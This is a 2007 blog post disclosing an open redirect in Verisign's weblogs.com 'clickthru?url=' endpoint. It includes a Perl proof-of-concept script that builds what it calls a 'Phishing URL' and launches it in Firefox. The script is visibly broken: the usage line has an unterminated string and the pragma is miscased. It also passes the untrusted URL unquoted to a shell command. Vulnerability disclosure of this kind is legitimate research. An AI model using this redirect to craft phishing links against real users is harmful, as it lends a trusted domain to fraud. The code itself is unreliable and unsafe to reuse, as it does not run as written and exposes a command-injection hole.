0Kn0ck's Blog - dt sns!_*
Verisign Weblogs : Base For Third Party Redirection Attacks
The weblogs is a verisign service for currently updating the blogs and provide requisits information to the users of specific blog which has been updated.The weblog can act as a base for redirection attacks because traffic gets easily redirected from the website. This ensures weakness in a way if the URL is used by the third party it still redirects the traffic.No doubt if the link is clicked form the website it directs to the required destination but if is filtered fully than third party wont set the redirection easily.But thats not a case here.
The third party can easily manipulate the traffic.
The Required URL which is affected is :
http://www.weblogs.com/clickthru?url=
Example : Get To Google Via Weblogs.com
Proof Of Concept Script In Perl:
use STRICT;
print "[*] Phishing Base : Verisign Weblogs.com\n";
print "[*] POC By: Zeroknock [at] Metaeye.Org\n\n";
print "[*] Note : Set Firefox In The Default Path As Path=\n\n";
die "[*] Usage : $0
my $exploited_url="http://www.weblogs.com/clickthru?url=";
print "[*] Base URL : $exploited_url \n";
my $website_hit = $ARGV[0];
print "[*] Redirected URL : $website_hit\n";
my $phishing = $exploited_url.$website_hit;
print "[*] Phishing URL : $phishing\n";
system("firefox $phishing");
print "[*] Firefox Fired!\n";
print "[*] Redirection Successfull!\n";
This script automatically redirects traffic from the Weblogs site.
Note : The issue has already been reported to the Verisign.
A alert has been undertaken.Acc to verisign they considered
it not as vulnerability.But the reality is displayed in front.
It is a result of improper filtering on the website.
[Zknk]
Posted on 1/01/2007 10:29:00 PM by 0kn0ck | 0 Comments
